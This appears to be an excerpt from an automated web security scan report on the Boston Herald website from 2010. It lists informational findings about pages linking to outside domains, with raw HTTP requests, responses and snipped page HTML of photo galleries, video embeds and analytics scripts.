<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4458','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101020/stp/fa4a70_101410sturmtf11.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Marco Sturm nets stylish choices"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Marco Sturm nets stylish choices">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4455','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101020/stp/8d568a_101910celticsmw13.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4452','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101019/stp/48999a_101810bruinstf05.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Bruins pratice"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Bruins pratice">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4449','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101017/stp/0d59ee_101710pats18.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4445','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101016/stp/9cc789_100810patsjw03.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Patriots - Saturday"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Patriots - Saturday">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4443','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101015/stp/367211_101510footballce004.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4441','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101015/stp/06df0b_101410patriotsmw13.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4439','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101014/stp/795c9a_101310patriotstf03.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4438','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101014/stp/2787ca_101310bruinspw011.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4436','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101013/stp/aaa6c0_101210patsnl17.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4433','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101012/stp/ff8eaf_101110celticstf14.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Celtics practice"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Celtics practice">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4431','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101011/stp/f691f9_101010celticsmw14.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4424','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101009/stp/21a47b_100910harvardjw07.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4423','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101009/stp/ac1815_100810patsjw12.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4419','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101008/stp/d450af_100710patsjw19.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4415','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101007/stp/d2c5b9_100610celticsms01.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4407','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101005/stp/6a578c_100510celtsar05.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4404','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101005/stp/a8f666_100410patriotsmw43.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Patriots 41, Dolphin 14"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Patriots 41, Dolphin 14">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4397','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101003/stp/717bd4_100310redsoxkm27.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4396','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101003/stp/d72784_100210bcfootballjw08.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\BC football"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\BC football">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4494','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101101/stp/8193a3_103110florencekm08.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4460','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101020/stp/aa4488_21ghos4.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4459','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101020/stp/4ad8be_101810tiffanytf04.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Tiffany's new handbag line"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Tiffany's new handbag line">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4435','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101012/stp/b78c53_Premiere_Hereafter_NY__trose@heraldinteractive.com_7.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4421','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101008/stp/2d0b15_100910lauf12.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4417','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101007/stp/46aee4_100610hous04.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4410','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101006/stp/aa92d8_pold.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4495','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101101/stp/14ed81_110410shaq01.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4479','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101027/stp/192b5f_2010102720101027209632.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\Celebs at the Garden for the Celtics-Heat game"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\Celebs at the Garden for the Celtics-Heat game">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4462','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101021/stp/c30001_73072_1533486631381_1661255220_1332182_5774520_n.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\Shaq strikes a pose in Harvard Square"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\Shaq strikes a pose in Harvard Square">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4399','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101004/stp/cabf78_Dempsey_Challenge__trose@heraldinteractive.com_3.jpg" alt="Photo" /></a>
...[SNIP]...
<div class="gutter_teaseInner" style="padding: 0px; padding-bottom:10px;" >

<img width="100%" src="http://multimedia.heraldinteractive.com/images/20101107/17ad46_110610cahillfn03.JPG" />

<div style="padding: 0px 10px 0px 10px;">
...[SNIP]...
<p><a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/photo/?photo_name=17ad46_110610cahillfn03" ><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mediacenter/btn_order_prints_yellow.png" /></a>
...[SNIP]...
<a href="/news/us_politics/view.bg?articleid=1294859"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101108/cb73f7_lisam11082010.jpg"></a>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<li>
<a href="http://gallery.pictopia.com/bostonherald/"><h3>
...[SNIP]...
<div class="gutter_teaseInner">
<a href="http://gallery.pictopia.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/siteImages/teaseBoxes/purchasePhotos.gif" /></a>
...[SNIP]...
<br />
<a href="http://gallery.pictopia.com/bostonherald/">Click here</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
        No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
</body>

       <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...

8.15. http://bostonherald.com/mediacenter/video.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/mediacenter/video.php

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv&media_id=1697&title=Wedding%20limo%20highjacking&program_id=4c6ebfbed6269&width=320&height=275

The response contains the following links to other domains:

http://objects.tremormedia.com/embed/js/4c6ebfbed6269_p.js
http://objects.tremormedia.com/embed/js/embed.js

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv&media_id=1697&title=Wedding%20limo%20highjacking&program_id=4c6ebfbed6269&width=320&height=275 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.14.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.4.10.1289175481; RMFD=011PFFPzO101yed8|O1021J6R

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 00:22:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2632
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<div id="stage">

<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/embed.js"></script>
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/4c6ebfbed6269_p.js"></script>
...[SNIP]...

8.16. http://bostonherald.com/mediacenter/video.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/mediacenter/video.php

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv&media_id=1697&title=Wedding

The response contains the following links to other domains:

http://objects.tremormedia.com/embed/js/_p.js
http://objects.tremormedia.com/embed/js/embed.js

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv&media_id=1697&title=Wedding limo highjacking&program_id=4c6ebfbed6269&width=320&height=275 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:28:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2571
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<div id="stage">

<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/embed.js"></script>
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/_p.js"></script>
...[SNIP]...

8.17. http://bostonherald.com/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/news/?srvc=home&position=also

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2F&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://cache.heraldinteractive.com/images/siteImages/blogLogos/MediaBizBlog.gif
http://cache.heraldinteractive.com/images/siteImages/blogLogos/cityDeskWired.gif
http://cache.heraldinteractive.com/images/siteImages/blogLogos/theLoneRepublican.gif
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxDollars177.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniPoll.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/news/throwdown/FridayThrowdown0610_234x60.jpg
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_enews.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_home.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_mobil.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_news.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news
http://feeds.feedburner.com/bostonherald/news/
http://feeds.feedburner.com/bostonherald/news/international/
http://feeds.feedburner.com/bostonherald/news/national/
http://feeds.feedburner.com/bostonherald/news/national/offbeat/
http://feeds.feedburner.com/bostonherald/news/national/politics/
http://feeds.feedburner.com/bostonherald/news/obituaries/
http://feeds.feedburner.com/bostonherald/news/opinion/
http://feeds.feedburner.com/bostonherald/news/opinion/columnists/
http://feeds.feedburner.com/bostonherald/news/regional/
http://feeds.feedburner.com/bostonherald/news/regional/politics/
http://multimedia.heraldinteractive.com/images/20101107/f448d0_mbta_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/0b0f8e_stab_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/0b646b_killer_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/4c267b_splash_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/55f979_petit.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/721367_poli_07052010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/f448d0_mbta_11082010.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
